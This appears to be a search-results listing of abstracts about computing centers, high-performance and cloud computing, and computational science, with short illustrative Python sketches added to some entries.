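    A = np.column_stack([2 * keep[:, 0], 2 * keep[:, 1], np.ones(len(keep))])
    b = (keep ** 2).sum(axis=1)
    cx, cy, _ = np.linalg.lstsq(A, b, rcond=None)[0]
    return cx, cy

# A circular boundary around (10, 5) with one occluding spike.
t = np.linspace(0, 2 * np.pi, 200, endpoint=False)
pts = np.column_stack([10 + 4 * np.cos(t), 5 + 4 * np.sin(t)])
pts[50] += [3.0, 3.0]                # simulated eyelid artifact
print(np.round(pupil_center(pts), 2))  # center recovered near (10, 5)
```

    The spiked point produces a near-180-degree turning angle and is excluded, so the fit recovers the true center despite the artifact, which is the robustness property the abstract claims.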

  17. RIACS

    NASA Technical Reports Server (NTRS)

    Moore, Robert C.

    1998-01-01

    The Research Institute for Advanced Computer Science (RIACS) was established by the Universities Space Research Association (USRA) at the NASA Ames Research Center (ARC) on June 6, 1983. RIACS is privately operated by USRA, a consortium of universities that serves as a bridge between NASA and the academic community. Under a five-year cooperative agreement with NASA, research at RIACS is focused on areas that are strategically enabling to the Ames Research Center's role as NASA's Center of Excellence for Information Technology. Research is carried out by a staff of full-time scientists, augmented by visitors, students, postdoctoral candidates, and visiting university faculty. RIACS is chartered to carry out research and development in computer science. This work is devoted in the main to tasks that are strategically enabling with respect to NASA's bold mission in space exploration and aeronautics. There are three foci for this work: Automated Reasoning, Human-Centered Computing, and High Performance Computing and Networking. RIACS has the additional goal of broadening the base of researchers in these areas of importance to the nation's space and aeronautics enterprises. Through its visiting scientist program, RIACS facilitates the participation of university-based researchers, including both faculty and students, in the research activities of NASA and RIACS. RIACS researchers work in close collaboration with NASA computer scientists on projects such as the Remote Agent Experiment on the Deep Space One mission and Super-Resolution Surface Modeling.

  18. On-demand provisioning of HEP compute resources on cloud sites and shared HPC centers

    NASA Astrophysics Data System (ADS)

    Erli, G.; Fischer, F.; Fleig, G.; Giffels, M.; Hauth, T.; Quast, G.; Schnepf, M.; Heese, J.; Leppert, K.; Arnaez de Pedro, J.; Sträter, R.

    2017-10-01

    This contribution reports on solutions, experiences and recent developments with the dynamic, on-demand provisioning of remote computing resources for analysis and simulation workflows. Local resources of a physics institute are extended by private and commercial cloud sites, ranging from the inclusion of desktop clusters over institute clusters to HPC centers. Rather than relying on dedicated HEP computing centers, it is nowadays more reasonable and flexible to utilize remote computing capacity via virtualization techniques or container concepts. We report on recent experience from incorporating a remote HPC center (NEMO Cluster, Freiburg University) and resources dynamically requested from the commercial provider 1&1 Internet SE into our institute's computing infrastructure. The Freiburg HPC resources are requested via the standard batch system, allowing HPC and HEP applications to be executed simultaneously, such that regular batch jobs run side by side with virtual machines managed via OpenStack [1]. For the inclusion of the 1&1 commercial resources, a Python API and SDK as well as the possibility to upload images were available. Large scale tests prove the capability to serve the scientific use case in the European 1&1 datacenters. The described environment at the Institute of Experimental Nuclear Physics (IEKP) at KIT serves the needs of researchers participating in the CMS and Belle II experiments. In total, resources exceeding half a million CPU hours have been provided by remote sites.

  19. White paper: A plan for cooperation between NASA and DARPA to establish a center for advanced architectures

    NASA Technical Reports Server (NTRS)

    Denning, P. J.; Adams, G. B., III; Brown, R. L.; Kanerva, P.; Leiner, B. M.; Raugh, M. R.

    1986-01-01

    Large, complex computer systems require many years of development. It is recognized that large scale systems are unlikely to be delivered in useful condition unless users are intimately involved throughout the design process. A mechanism is described that will involve users in the design of advanced computing systems and will accelerate the insertion of new systems into scientific research. This mechanism is embodied in a facility called the Center for Advanced Architectures (CAA). CAA would be a division of RIACS (Research Institute for Advanced Computer Science) and would receive its technical direction from a Scientific Advisory Board established by RIACS. The CAA described here is a possible implementation of a center envisaged in a proposed cooperation between NASA and DARPA.

  20. Bayesian Research at the NASA Ames Research Center,Computational Sciences Division

    NASA Technical Reports Server (NTRS)

    Morris, Robin D.

    2003-01-01

    NASA Ames Research Center is one of NASA's oldest centers, having started out as part of the National Advisory Committee for Aeronautics (NACA). The site, about 40 miles south of San Francisco, still houses many wind tunnels and other aviation related departments. In recent years, with the growing realization that space exploration is heavily dependent on computing and data analysis, its focus has turned more towards Information Technology. The Computational Sciences Division has expanded rapidly as a result. In this article, I will give a brief overview of some of the past and present projects with a Bayesian content. Much more than is described here goes on within the Division. The web pages at http://ic.arc.nasa.gov give more information on these and the other Division projects.

  1. Cyber Security: Big Data Think II Working Group Meeting

    NASA Technical Reports Server (NTRS)

    Hinke, Thomas; Shaw, Derek

    2015-01-01

    This presentation focuses on approaches that could be used by a data computation center to identify attacks and to ensure that malicious code and backdoors are identified if planted in a system. The goal is to identify actionable security information from the mountain of data that flows into and out of an organization. The approaches are applicable to big data computational centers, and some must also use big data techniques to extract the actionable security information from that flow of data. The briefing covers the detection of malicious delivery sites and techniques for reducing the mountain of data so that intrusion detection information can be useful, and not hidden in a plethora of false alerts. It also looks at the identification of possible unauthorized data exfiltration.

  2. Postdoctoral Fellow | Center for Cancer Research

    Cancer.gov

    The Neuro-Oncology Branch (NOB), Center for Cancer Research (CCR), National Cancer Institute (NCI) of the National Institutes of Health (NIH) is seeking outstanding postdoctoral candidates interested in studying metabolic and cell signaling pathways in the context of brain cancers through construction of computational models amenable to formal computational analysis and simulation. The ability to closely collaborate with the modern metabolomics center developed at CCR provides a unique opportunity for a postdoctoral candidate with a strong theoretical background and interest in demonstrating the incredible potential of computational approaches to solve problems from scientific disciplines and improve lives. The candidate will be given the opportunity to both construct data-driven models, as well as biologically validate the models by demonstrating the ability to predict the effects of altering tumor metabolism in laboratory and clinical settings.

  3. Tools for Analyzing Computing Resource Management Strategies and Algorithms for SDR Clouds

    NASA Astrophysics Data System (ADS)

    Marojevic, Vuk; Gomez-Miguelez, Ismael; Gelonch, Antoni

    2012-09-01

    Software defined radio (SDR) clouds centralize the computing resources of base stations. The computing resource pool is shared between radio operators and dynamically loads and unloads digital signal processing chains to provide wireless communications services on demand. Each new user session request requires the allocation of computing resources for executing the corresponding SDR transceivers. The huge amount of computing resources in SDR cloud data centers and the numerous session requests at certain hours of the day require efficient computing resource management. We propose a hierarchical approach, where the data center is divided into clusters that are managed in a distributed way. This paper presents a set of tools for analyzing computing resource management strategies and algorithms for SDR clouds. We use the tools to evaluate different strategies and algorithms. The results show that more sophisticated algorithms can achieve higher resource occupations and that a tradeoff exists between cluster size and algorithm complexity.
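
    The kind of cluster-level admission decision such tools evaluate can be illustrated with a first-fit allocator: each session requests an amount of processing capacity and is admitted to the first cluster with enough spare capacity. This is a generic sketch, not one of the paper's algorithms; the capacities and demands are invented.

```python
# First-fit allocation of SDR session requests across clusters.
# `clusters` holds the spare capacity of each cluster; a session is
# admitted to the first cluster that can host it, or blocked.

def allocate(session_demand, clusters):
    """Admit a session to the first cluster with enough free capacity.

    Returns the cluster index, or None if the request is blocked.
    """
    for i, free in enumerate(clusters):
        if free >= session_demand:
            clusters[i] -= session_demand
            return i
    return None

clusters = [100.0, 100.0]        # spare capacity per cluster
print(allocate(60.0, clusters))  # 0 -> first cluster takes it
print(allocate(60.0, clusters))  # 1 -> first cluster now too full
print(allocate(60.0, clusters))  # None -> request blocked
```

    Comparing blocking rates and resource occupation of allocators like this one, across different cluster sizes, is exactly the tradeoff the abstract reports.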

  4. Argonne Out Loud: Computation, Big Data, and the Future of Cities

    ScienceCinema

    Catlett, Charlie

    2018-01-16

    Charlie Catlett, a Senior Computer Scientist at Argonne and Director of the Urban Center for Computation and Data at the Computation Institute of the University of Chicago and Argonne, talks about how he and his colleagues are using high-performance computing, data analytics, and embedded systems to better understand and design cities.

  5. LaRC local area networks to support distributed computing

    NASA Technical Reports Server (NTRS)

    Riddle, E. P.

    1984-01-01

    The Langley Research Center's (LaRC) Local Area Network (LAN) effort is discussed. LaRC initiated the development of a LAN to support a growing distributed computing environment at the Center. The purpose of the network is to provide an improved capability (over interactive and RJE terminal access) for sharing multivendor computer resources. Specifically, the network will provide a data highway for the transfer of files between mainframe computers, minicomputers, work stations, and personal computers. An important influence on the overall network design was the vital need of LaRC researchers to efficiently utilize the large CDC mainframe computers in the central scientific computing facility. Although there was a steady migration from a centralized to a distributed computing environment at LaRC in recent years, the work load on the central resources increased. Major emphasis in the network design was on communication with the central resources within the distributed environment. The network to be implemented will allow researchers to utilize the central resources, distributed minicomputers, work stations, and personal computers to obtain the proper level of computing power to efficiently perform their jobs.

  6. CILT2000: Ubiquitous Computing--Spanning the Digital Divide.

    ERIC Educational Resources Information Center

    Tinker, Robert; Vahey, Philip

    2002-01-01

    Discusses the role of ubiquitous and handheld computers in education. Summarizes the contributions of the Center for Innovative Learning Technologies (CILT) and describes the ubiquitous computing sessions at the CILT2000 Conference. (Author/YDS)

  7. ComputerTown: A Do-It-Yourself Community Computer Project. [Computer Town, USA and Other Microcomputer Based Alternatives to Traditional Learning Environments].

    ERIC Educational Resources Information Center

    Zamora, Ramon M.

    Alternative learning environments offering computer-related instruction are developing around the world. Storefront learning centers, museum-based computer facilities, and special theme parks are some of the new concepts. ComputerTown, USA! is a public access computer literacy project begun in 1979 to serve both adults and children in Menlo Park…

  8. Computer Center/DP Management. Papers Presented at the Association for Educational Data Systems Annual Convention (Phoenix, Arizona, May 3-7, 1976).

    ERIC Educational Resources Information Center

    Association for Educational Data Systems, Washington, DC.

    Fifteen papers on computer centers and data processing management presented at the Association for Educational Data Systems (AEDS) 1976 convention are included in this document. The first two papers review the recent controversy for proposed licensing of data processors, and they are followed by a description of the Institute for Certification of…

  9. 37. Photograph of plan for repairs to computer room, 1958, ...

    Library of Congress Historic Buildings Survey, Historic Engineering Record, Historic Landscapes Survey

    37. Photograph of plan for repairs to computer room, 1958, prepared by the Public Works Office, Underwater Sound Laboratory. Drawing on file at Caretaker Site Office, Naval Undersea Warfare Center, New London. Copyright-free. - Naval Undersea Warfare Center, Bowditch Hall, 600 feet east of Smith Street & 350 feet south of Columbia Cove, West bank of Thames River, New London, New London County, CT

  10. Ethics, Identity, and Political Vision: Toward a Justice-Centered Approach to Equity in Computer Science Education

    ERIC Educational Resources Information Center

    Vakil, Sepehr

    2018-01-01

    In this essay, Sepehr Vakil argues that a more serious engagement with critical traditions in education research is necessary to achieve a justice-centered approach to equity in computer science (CS) education. With CS rapidly emerging as a distinct feature of K-12 public education in the United States, calls to expand CS education are often…

  11. Investigating Impact Metrics for Performance for the US EPA National Center for Computational Toxicology (ACS Fall meeting)

    EPA Science Inventory

    The U.S. Environmental Protection Agency (EPA) Computational Toxicology Program integrates advances in biology, chemistry, and computer science to help prioritize chemicals for further research based on potential human health risks. This work involves computational and data drive...

  12. CHIRAL--A Computer Aided Application of the Cahn-Ingold-Prelog Rules.

    ERIC Educational Resources Information Center

    Meyer, Edgar F., Jr.

    1978-01-01

    A computer program is described for identification of chiral centers in molecules. Essential input to the program includes both atomic and bonding information. The program does not require computer graphic input-output. (BB)

  13. Facilities | Integrated Energy Solutions | NREL

    Science.gov Websites

    strategies needed to optimize our entire energy system. A photo of the high-performance computer at NREL . High-Performance Computing Data Center High-performance computing facilities at NREL provide high-speed

  14. Computers and Technological Forecasting

    ERIC Educational Resources Information Center

    Martino, Joseph P.

    1971-01-01

    Forecasting is becoming increasingly automated, thanks in large measure to the computer. It is now possible for a forecaster to submit his data to a computation center and call for the appropriate program. (No knowledge of statistics is required.) (Author)

  15. Applied Computational Fluid Dynamics at NASA Ames Research Center

    NASA Technical Reports Server (NTRS)

    Holst, Terry L.; Kwak, Dochan (Technical Monitor)

    1994-01-01

    The field of Computational Fluid Dynamics (CFD) has advanced to the point where it can now be used for many applications in fluid mechanics research and aerospace vehicle design. A few applications being explored at NASA Ames Research Center will be presented and discussed. The examples presented will range in speed from hypersonic to low speed incompressible flow applications. Most of the results will be from numerical solutions of the Navier-Stokes or Euler equations in three space dimensions for general geometry applications. Computational results will be used to highlight the presentation as appropriate. Advances in computational facilities including those associated with NASA's CAS (Computational Aerosciences) Project of the Federal HPCC (High Performance Computing and Communications) Program will be discussed. Finally, opportunities for future research will be presented and discussed. All material will be taken from non-sensitive, previously-published and widely-disseminated work.

  16. A resource-sharing model based on a repeated game in fog computing.

    PubMed

    Sun, Yan; Zhang, Nan

    2017-03-01

    With the rapid development of cloud computing techniques, the number of users is undergoing exponential growth. It is difficult for traditional data centers to perform many tasks in real time because of the limited bandwidth of resources. The concept of fog computing is proposed to support traditional cloud computing and to provide cloud services. In fog computing, the resource pool is composed of sporadic distributed resources that are more flexible and movable than a traditional data center. In this paper, we propose a fog computing structure and present a crowd-funding algorithm to integrate spare resources in the network. Furthermore, to encourage more resource owners to share their resources with the resource pool and to supervise the resource supporters as they actively perform their tasks, we propose an incentive mechanism in our algorithm. Simulation results show that our proposed incentive mechanism can effectively reduce the SLA violation rate and accelerate the completion of tasks.

  17. Design of a robotic vehicle with self-contained intelligent wheels

    NASA Astrophysics Data System (ADS)

    Poulson, Eric A.; Jacob, John S.; Gunderson, Robert W.; Abbott, Ben A.

    1998-08-01

    The Center for Intelligent Systems has developed a small robotic vehicle named the Advanced Rover Chassis 3 (ARC 3) with six identical intelligent wheel units attached to a payload via a passive linkage suspension system. All wheels are steerable, so the ARC 3 can move in any direction while rotating at any rate allowed by the terrain and motors. Each intelligent wheel unit contains a drive motor, steering motor, batteries, and computer. All wheel units are identical, so manufacturing, programming, and spare replacement are greatly simplified. The intelligent wheel concept would allow the number and placement of wheels on the vehicle to be changed with no changes to the control system, except to list the position of each wheel relative to the vehicle center. The task of controlling the ARC 3 is distributed between one master computer and the wheel computers. Tasks such as controlling the steering motors and calculating the speed of each wheel relative to the vehicle speed in a corner depend on the location of a wheel relative to the vehicle center and are processed by the wheel computers. Conflicts between the wheels are eliminated by computing the vehicle velocity control in the master computer. Various approaches to this distributed control problem, and various low level control methods, have been explored.
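
    The per-wheel computation the abstract describes follows from planar rigid-body kinematics: each wheel's ground velocity is the commanded body velocity plus the rotational term omega x r, so the wheel computer only needs its own position relative to the vehicle center. The function below is a hedged sketch of that calculation, not the ARC 3 control code; the positions and commands are invented.

```python
# Sketch of the steering-angle/speed computation a wheel unit can
# perform locally from the vehicle velocity command (vx, vy, omega)
# and its own position (wheel_x, wheel_y) relative to the center.
import math

def wheel_command(vx, vy, omega, wheel_x, wheel_y):
    """Return (steering angle in rad, wheel speed) for one wheel.

    Ground velocity of the wheel = body velocity + omega x r, so an
    outer wheel runs faster in a corner, as the abstract notes.
    """
    wvx = vx - omega * wheel_y      # 2-D cross product: omega x r
    wvy = vy + omega * wheel_x
    return math.atan2(wvy, wvx), math.hypot(wvx, wvy)

# Pure rotation in place: a wheel 1 m from the center steers
# tangentially and turns at omega * radius.
angle, speed = wheel_command(0.0, 0.0, 1.0, 1.0, 0.0)
print(round(speed, 3))  # 1.0 m/s for omega = 1 rad/s at 1 m
```

    Because the formula depends only on the wheel's own offset, adding or moving wheels changes nothing but the position list, which is the flexibility the abstract claims for the intelligent-wheel concept.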

  18. Berkeley Lab - Materials Sciences Division

    Science.gov Websites

Computational Study of Excited-State Phenomena in Energy Materials; Center for X-ray Optics (Patrick Naulleau, Director); MSD facilities; ion facilities and centers.

  19. Parallel neural pathways in higher visual centers of the Drosophila brain that mediate wavelength-specific behavior

    PubMed Central

    Otsuna, Hideo; Shinomiya, Kazunori; Ito, Kei

    2014-01-01

    Compared with connections between the retinae and primary visual centers, relatively less is known in both mammals and insects about the functional segregation of neural pathways connecting primary and higher centers of the visual processing cascade. Here, using the Drosophila visual system as a model, we demonstrate two levels of parallel computation in the pathways that connect primary visual centers of the optic lobe to computational circuits embedded within deeper centers in the central brain. We show that a seemingly simple achromatic behavior, namely phototaxis, is under the control of several independent pathways, each of which is responsible for navigation towards unique wavelengths. Silencing just one pathway is enough to disturb phototaxis towards one characteristic monochromatic source, whereas phototactic behavior towards white light is not affected. The response spectrum of each demonstrable pathway is different from that of individual photoreceptors, suggesting subtractive computations. A choice assay between two colors showed that these pathways are responsible for navigation towards, but not for the detection itself of, the monochromatic light. The present study provides novel insights about how visual information is separated and processed in parallel to achieve robust control of an innate behavior. PMID:24574974

  20. Current state and future direction of computer systems at NASA Langley Research Center

    NASA Technical Reports Server (NTRS)

    Rogers, James L. (Editor); Tucker, Jerry H. (Editor)

    1992-01-01

Computer systems have advanced at a rate unmatched by any other area of technology. As performance has dramatically increased, there has been an equally dramatic reduction in cost. This constant cost-performance improvement has precipitated the pervasiveness of computer systems into virtually all areas of technology. This improvement is due primarily to advances in microelectronics. Most people are now convinced that the new generation of supercomputers will be built using a large number (possibly thousands) of high performance microprocessors. Although the spectacular improvements in computer systems have come about because of these hardware advances, there has also been a steady improvement in software techniques. In an effort to understand how these hardware and software advances will affect research at NASA LaRC, the Computer Systems Technical Committee drafted this white paper to examine the current state and possible future directions of computer systems at the Center. This paper discusses selected important areas of computer systems including real-time systems, embedded systems, high performance computing, distributed computing networks, data acquisition systems, artificial intelligence, and visualization.

  1. Future of Department of Defense Cloud Computing Amid Cultural Confusion

    DTIC Science & Technology

    2013-03-01

enterprise cloud-computing environment and transition to a public cloud service provider. Services have started the development of individual cloud-computing environments... endorsing cloud computing. It addresses related issues in matters of service culture changes and how strategic leaders will dictate the future of cloud ... through data center consolidation and individual Service-provided cloud computing.

  2. Computer Needs and Computer Problems in Developing Countries.

    ERIC Educational Resources Information Center

    Huskey, Harry D.

    A survey of the computer environment in a developing country is provided. Levels of development are considered and the educational requirements of countries at various levels are discussed. Computer activities in India, Burma, Pakistan, Brazil and a United Nations sponsored educational center in Hungary are all described. (SK/Author)

  3. Computer Viruses. Legal and Policy Issues Facing Colleges and Universities.

    ERIC Educational Resources Information Center

    Johnson, David R.; And Others

    Compiled by various members of the higher educational community together with risk managers, computer center managers, and computer industry experts, this report recommends establishing policies on an institutional level to protect colleges and universities from computer viruses and the accompanying liability. Various aspects of the topic are…

  4. PACCE: Perl Algorithm to Compute Continuum and Equivalent Widths

    NASA Astrophysics Data System (ADS)

    Riffel, Rogério; Borges Vale, Tibério

    2011-05-01

    PACCE (Perl Algorithm to Compute continuum and Equivalent Widths) computes continuum and equivalent widths. PACCE is able to determine mean continuum and continuum at line center values, which are helpful in stellar population studies, and is also able to compute the uncertainties in the equivalent widths using photon statistics.
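The equivalent width a tool like PACCE computes is W = ∫(1 − F/F_c) dλ, the width of a rectangular line of full depth with the same integrated area relative to the continuum. A minimal numerical sketch using the trapezoidal rule (an illustration of the quantity, not PACCE's actual Perl implementation):

```python
import numpy as np

def equivalent_width(wavelength, flux, continuum):
    """Equivalent width W = integral of (1 - F/Fc) dlambda via the
    trapezoidal rule. Positive W indicates absorption below the continuum."""
    integrand = 1.0 - flux / continuum
    # trapezoidal integration over a possibly non-uniform wavelength grid
    return float(np.sum((integrand[1:] + integrand[:-1]) / 2.0
                        * np.diff(wavelength)))
```

A flat spectrum equal to its continuum gives W = 0; a box-shaped line of depth 0.5 spanning 3 grid points contributes its depth times its effective width.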

  5. Delivering an Informational Hub for Data at the National Center for Computational Toxicology (ACS Spring Meeting) 7 of 7

    EPA Science Inventory

    The U.S. Environmental Protection Agency (EPA) Computational Toxicology Program integrates advances in biology, chemistry, and computer science to help prioritize chemicals for further research based on potential human health risks. This work involves computational and data drive...

  6. 76 FR 1410 - Privacy Act of 1974; Computer Matching Program

    Federal Register 2010, 2011, 2012, 2013, 2014

    2011-01-10

    ...; Computer Matching Program AGENCY: Defense Manpower Data Center (DMDC), DoD. ACTION: Notice of a Computer... administrative burden, constitute a greater intrusion of the individual's privacy, and would result in additional... Liaison Officer, Department of Defense. Notice of a Computer Matching Program Among the Defense Manpower...

  7. Computers, Networks, and Desegregation at San Jose High Academy.

    ERIC Educational Resources Information Center

    Solomon, Gwen

    1987-01-01

    Describes magnet high school which was created in California to meet desegregation requirements and emphasizes computer technology. Highlights include local computer networks that connect science and music labs, the library/media center, business computer lab, writing lab, language arts skills lab, and social studies classrooms; software; teacher…

  8. The Effect of Computer Automation on Institutional Review Board (IRB) Office Efficiency

    ERIC Educational Resources Information Center

    Oder, Karl; Pittman, Stephanie

    2015-01-01

    Companies purchase computer systems to make their processes more efficient through automation. Some academic medical centers (AMC) have purchased computer systems for their institutional review boards (IRB) to increase efficiency and compliance with regulations. IRB computer systems are expensive to purchase, deploy, and maintain. An AMC should…

  9. Manual on characteristics of Landsat computer-compatible tapes produced by the EROS Data Center digital image processing system

    USGS Publications Warehouse

    Holkenbrink, Patrick F.

    1978-01-01

    Landsat data are received by National Aeronautics and Space Administration (NASA) tracking stations and converted into digital form on high-density tapes (HDTs) by the Image Processing Facility (IPF) at the Goddard Space Flight Center (GSFC), Greenbelt, Maryland. The HDTs are shipped to the EROS Data Center (EDC) where they are converted into customer products by the EROS Data Center digital image processing system (EDIPS). This document describes in detail one of these products: the computer-compatible tape (CCT) produced from Landsat-1, -2, and -3 multispectral scanner (MSS) data and Landsat-3 only return-beam vidicon (RBV) data. Landsat-1 and -2 RBV data will not be processed by IPF/EDIPS to CCT format.

  10. Computer modeling with randomized-controlled trial data informs the development of person-centered aged care homes.

    PubMed

    Chenoweth, Lynn; Vickland, Victor; Stein-Parbury, Jane; Jeon, Yun-Hee; Kenny, Patricia; Brodaty, Henry

    2015-10-01

    To answer questions on the essential components (services, operations and resources) of a person-centered aged care home (iHome) using computer simulation. iHome was developed with AnyLogic software using extant study data obtained from 60 Australian aged care homes, 900+ clients and 700+ aged care staff. Bayesian analysis of simulated trial data will determine the influence of different iHome characteristics on care service quality and client outcomes. Interim results: A person-centered aged care home (socio-cultural context) and care/lifestyle services (interactional environment) can produce positive outcomes for aged care clients (subjective experiences) in the simulated environment. Further testing will define essential characteristics of a person-centered care home.

  11. 77 FR 38630 - Open Internet Advisory Committee

    Federal Register 2010, 2011, 2012, 2013, 2014

    2012-06-28

    ... Computer Science and Co-Founder of the Berkman Center for Internet and Society, Harvard University, is... of Technology Computer Science and Artificial Intelligence Laboratory, is appointed vice-chairperson... Jennifer Rexford, Professor of Computer Science, Princeton University Dennis Roberson, Vice Provost...

  12. Exposure Science and the US EPA National Center for Computational Toxicology

    EPA Science Inventory

    The emerging field of computational toxicology applies mathematical and computer models and molecular biological and chemical approaches to explore both qualitative and quantitative relationships between sources of environmental pollutant exposure and adverse health outcomes. The...

  13. Storage and network bandwidth requirements through the year 2000 for the NASA Center for Computational Sciences

    NASA Technical Reports Server (NTRS)

    Salmon, Ellen

    1996-01-01

    The data storage and retrieval demands of space and Earth sciences researchers have made the NASA Center for Computational Sciences (NCCS) Mass Data Storage and Delivery System (MDSDS) one of the world's most active Convex UniTree systems. Science researchers formed the NCCS's Computer Environments and Research Requirements Committee (CERRC) to relate their projected supercomputing and mass storage requirements through the year 2000. Using the CERRC guidelines and observations of current usage, some detailed projections of requirements for MDSDS network bandwidth and mass storage capacity and performance are presented.

  14. TOSCA calculations and measurements for the SLAC SLC damping ring dipole magnet

    NASA Astrophysics Data System (ADS)

    Early, R. A.; Cobb, J. K.

    1985-04-01

    The SLAC damping ring dipole magnet was originally designed with removable nose pieces at the ends. Recently, a set of magnetic measurements was taken of the vertical component of induction along the center of the magnet for four different pole-end configurations and several current settings. The three dimensional computer code TOSCA, which is currently installed on the National Magnetic Fusion Energy Computer Center's Cray X-MP, was used to compute field values for the four configurations at current settings near saturation. Comparisons were made for magnetic induction as well as effective magnetic lengths for the different configurations.

  15. 1999 NCCS Highlights

    NASA Technical Reports Server (NTRS)

    Bennett, Jerome (Technical Monitor)

    2002-01-01

    The NASA Center for Computational Sciences (NCCS) is a high-performance scientific computing facility operated, maintained and managed by the Earth and Space Data Computing Division (ESDCD) of NASA Goddard Space Flight Center's (GSFC) Earth Sciences Directorate. The mission of the NCCS is to advance leading-edge science by providing the best people, computers, and data storage systems to NASA's Earth and space sciences programs and those of other U.S. Government agencies, universities, and private institutions. Among the many computationally demanding Earth science research efforts supported by the NCCS in Fiscal Year 1999 (FY99) are the NASA Seasonal-to-Interannual Prediction Project, the NASA Search and Rescue Mission, Earth gravitational model development efforts, the National Weather Service's North American Observing System program, Data Assimilation Office studies, a NASA-sponsored project at the Center for Ocean-Land-Atmosphere Studies, a NASA-sponsored microgravity project conducted by researchers at the City University of New York and the University of Pennsylvania, the completion of a satellite-derived global climate data set, simulations of a new geodynamo model, and studies of Earth's torque. This document presents highlights of these research efforts and an overview of the NCCS, its facilities, and its people.

  16. CMSA: a heterogeneous CPU/GPU computing system for multiple similar RNA/DNA sequence alignment.

    PubMed

    Chen, Xi; Wang, Chen; Tang, Shanjiang; Yu, Ce; Zou, Quan

    2017-06-24

The multiple sequence alignment (MSA) is a classic and powerful technique for sequence analysis in bioinformatics. With the rapid growth of biological datasets, MSA parallelization becomes necessary to keep its running time at an acceptable level. Although there is a large body of work on MSA problems, existing approaches are either insufficient or contain implicit assumptions that limit their generality. First, the properties of users' sequences, including dataset size and sequence length, can take arbitrary values and are generally unknown before submission, which previous work unfortunately ignores. Second, the center star strategy is well suited to aligning similar sequences, but its first stage, center sequence selection, is highly time-consuming and requires further optimization. Moreover, on heterogeneous CPU/GPU platforms, prior studies parallelize MSA on the GPU only, leaving the CPUs idle during the computation. Co-run computation, by contrast, maximizes the utilization of computing resources by running the workload on both CPU and GPU simultaneously. This paper presents CMSA, a robust and efficient MSA system for large-scale datasets on the heterogeneous CPU/GPU platform. It performs and optimizes multiple sequence alignment automatically for users' submitted sequences without any assumptions. CMSA adopts the co-run computation model so that both CPU and GPU devices are fully utilized. Moreover, CMSA proposes an improved center star strategy that reduces the time complexity of its center sequence selection process from O(mn²) to O(mn). The experimental results show that CMSA achieves up to an 11× speedup and outperforms state-of-the-art software. CMSA focuses on multiple similar RNA/DNA sequence alignment and proposes a novel bitmap-based algorithm to improve the center star strategy.
We conclude that harnessing the high performance of modern GPUs is a promising approach to accelerating multiple sequence alignment, and that adopting the co-run computation model can significantly increase overall system utilization. The source code is available at https://github.com/wangvsa/CMSA .
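CMSA's bitmap-based algorithm is not reproduced here, but the baseline center-star stage it accelerates can be sketched as follows. Hamming distance stands in for an alignment-based distance, which is a reasonable proxy only for similar, equal-length sequences (exactly the regime CMSA targets):

```python
def hamming(a, b):
    """Mismatch count between equal-length sequences; a proxy distance
    for similar RNA/DNA, where bitmap/popcount tricks are applicable."""
    return sum(x != y for x, y in zip(a, b))

def center_sequence(seqs):
    """Naive center selection: pick the sequence minimizing the sum of
    distances to all others. This is the O(mn^2)-style stage that the
    improved strategy reduces to O(mn)."""
    return min(seqs, key=lambda s: sum(hamming(s, t) for t in seqs))
```

All remaining sequences are then pairwise-aligned against the chosen center, so speeding up this selection step directly shortens the whole pipeline.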

  17. UC Merced Center for Computational Biology Final Report

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Colvin, Michael; Watanabe, Masakatsu

Final report for the UC Merced Center for Computational Biology. The Center for Computational Biology (CCB) was established to support multidisciplinary scientific research and academic programs in computational biology at the new University of California campus in Merced. In 2003, the growing gap between biology research and education was documented in a report from the National Academy of Sciences, Bio2010: Transforming Undergraduate Education for Future Research Biologists. We believed that new undergraduate and graduate programs in the biological sciences that emphasized biological concepts and treated biology as an information science would have a dramatic impact in enabling this transformation of biology. UC Merced, the newest UC campus and the first new U.S. research university of the 21st century, was ideally suited to adopt an alternate strategy: to create a new Biological Sciences major and graduate group that incorporated the strong computational and mathematical vision articulated in the Bio2010 report. CCB aimed to leverage this commitment at UC Merced to develop a new educational program based on the principle of biology as a quantitative, model-driven science. We also expected that the center would enable the dissemination of computational biology course materials to other universities and feeder institutions, and foster research projects that exemplify a mathematical and computation-based approach to the life sciences. As this report describes, the CCB has been successful in achieving these goals, and multidisciplinary computational biology is now an integral part of UC Merced undergraduate, graduate, and research programs in the life sciences. The CCB began in fall 2004 with the aid of an award from the U.S. Department of Energy (DOE), under its Genomes to Life program of support for the development of research and educational infrastructure in the modern biological sciences.
This report to DOE describes the research and academic programs made possible by the CCB from its inception until August 2010, the end of the final extension. Although DOE support for the center ended in August 2010, the CCB will continue to exist and support its original objectives. The research and academic programs fostered by the CCB have led to additional extramural funding from other agencies, and we anticipate that CCB will continue to support the quantitative and computational biology program at UC Merced for many years to come. Since its inception in fall 2004, CCB research projects have maintained multi-institutional collaborations with Lawrence Livermore National Laboratory (LLNL) and the National Center for Supercomputing Applications at the University of Illinois at Urbana-Champaign, as well as with individual collaborators at other sites. CCB-affiliated faculty cover a broad range of computational and mathematical research, including molecular modeling, cell biology, applied math, evolutionary biology, and bioinformatics. The CCB sponsored the first distinguished speaker series at UC Merced, which had an important role in spreading the word about the computational biology emphasis at this new campus. One of CCB's original goals was to help train a new generation of biologists who bridge the gap between the computational and life sciences. To achieve this goal, by summer 2006 a summer undergraduate internship program had been established under CCB to train Biological Sciences researchers in highly mathematical and computationally intensive work. By the end of summer 2010, 44 undergraduate students had gone through this program. Of those participants, 11 students have been admitted to graduate schools and 10 more are interested in pursuing graduate studies in the sciences.
The center is also continuing to facilitate the development and dissemination of undergraduate and graduate course materials based on the latest research in computational biology.

  18. Computing Protein-Protein Association Affinity with Hybrid Steered Molecular Dynamics.

    PubMed

    Rodriguez, Roberto A; Yu, Lili; Chen, Liao Y

    2015-09-08

